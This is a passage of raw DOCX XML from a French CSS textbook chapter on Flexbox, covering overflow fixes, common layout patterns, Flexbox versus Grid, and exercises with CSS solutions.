              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un enfant flex a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>min-width: auto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> par défaut : il ne descend pas sous la largeur de son contenu. Un long mot, une URL ou une image empêchent donc la colonne de rétrécir. Solution : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>min-width: 0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur l'enfant.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La correction du débordement le plus fréquent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.colonne {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  flex: 1;</w:t>
        <w:br/>
        <w:t>min-width: 0;      /* autorise le rétrécissement sous la taille du contenu */</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.colonne p { overflow-wrap: anywhere; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>18.4 Cas d'usage typiques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Flexbox excelle pour les alignements en une dimension. Cinq motifs couvrent la majorité des besoins quotidiens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.61 — Cinq motifs et leurs pièges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8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Motif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="393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Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Barre de navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>space-between</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>align-items: center</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Menu qui déborde</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Centrage parfait</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>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center</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur les deux axes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Hauteur nulle du parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pied de carte collé en bas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>flex-direction: column</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>margin-top: auto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hauteur non définie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Étiquettes qui se replient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>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flex-wrap: wrap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Pas d'espacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Colonnes égales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>flex: 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenu long qui déborde</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux motifs fréquents, résolus en trois lignes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Pied de carte aligné en bas, quelle que soit la hauteur */</w:t>
        <w:br/>
        <w:t>.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: flex;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  flex-direction: column;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  height: 100%;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.carte__pied { margin-top: auto; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Étiquettes */</w:t>
        <w:br/>
        <w:t>.etiquettes { display: flex; flex-wrap: wrap; gap: .5rem; }</w:t>
        <w:br/>
        <w:t>.etiquette { padding: .2rem .6rem; border-radius: 999px; background: #e8edf1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le centrage vertical exige une hauteur sur le conteneur. Sur un élément dont la hauteur dépend du contenu, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>align-items: center</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'a aucun effet visible : il n'y a rien à centrer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>18.5 Flexbox ou Grid ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les deux modèles se complètent. La règle pratique : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>une dimension, Flexbox ; deux dimensions, Grid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Cela dit, Flexbox reste excellent pour les composants internes, même dans une page construite en Grid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2413000"/>
            <wp:docPr id="28" name="Picture 28"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f26.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2413000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.26 — Deux modèles complémentaires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Combiner les deux sans dogme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La page en Grid, les composants en Flex */</w:t>
        <w:br/>
        <w:t>.page {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-columns: 16rem 1fr;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 2rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.barre { display: flex; justify-content: space-between; align-items: center; }</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QUATRE QUESTIONS AVANT DE CHOISIR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Ai-je besoin d'aligner sur deux axes à la fois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Les éléments ont-ils une taille intrinsèque importante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La structure est-elle connue à l'avance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S'agit-il d'un composant interne ou d'une page entière ?</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Flexbox organise un axe principal et un axe secondaire.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justify-content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> agit sur l'axe principal, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>align-items</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur l'autre.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flex: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> répartit l'espace libre entre les enfants.</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min-width: 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> corrige la plupart des débordements de colonnes flex.</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flex-wrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> gèrent le passage à la ligne proprement.</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margin-top: auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> colle un pied de carte en bas.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Grid pour la page, Flexbox pour les composants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une dimension est maîtrisée. Le chapitre suivant ajoute la seconde : CSS Grid et les mises en page complètes.</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18.1 — Barre de navigation responsive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Construisez une barre avec marque à gauche, liens au centre et bouton à droite, qui passe sur deux lignes en mobile.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 xml:space="preserve">Utilisez Flexbox et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gap</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Prévoyez le repli sur petit écran.</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l'alignement vertical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 18.2 — Galerie de cartes égales</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Alignez quatre cartes de hauteurs de texte différentes.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Les cartes doivent avoir la même hauteur.</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Le pied de chaque carte doit être aligné.</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Le passage à la ligne doit rester propre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 18.3 — Diagnostiquer un débordement flex</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 xml:space="preserve">Une colonne flex déborde sur mobile malgré </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex: 1</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Identifiez la cause probable.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Proposez deux corrections.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 xml:space="preserve">Expliquez pourquoi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>overflow: hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est pas une solution.</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18.1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.barre {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: flex;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  flex-wrap: wrap;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  align-items: center;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  justify-content: space-between;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 1rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.barre__liens {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: flex;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 1.25rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  list-style: none;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 0;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>@media (max-width: 40rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .barre { justify-content: center; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .barre__liens { order: 3; flex-basis: 100%; justify-content: center; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex-wrap: wrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet le passage à la ligne ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex-basis: 100%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> force les liens à occuper une ligne complète en mobile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>align-items: center</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aligne la marque, les liens et le bouton sur l'axe secondaire. Sans hauteur fixe, chaque élément garde sa hauteur naturelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 18.2</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.galerie { display: flex; flex-wrap: wrap; gap: 1.25rem; }</w:t>
        <w:br/>
        <w:t>.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  flex: 1 1 16rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: flex;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  flex-direction: column;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 1.25rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 1px solid #e8edf1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 12px;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.carte__pied { margin-top: auto; padding-top: 1rem; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
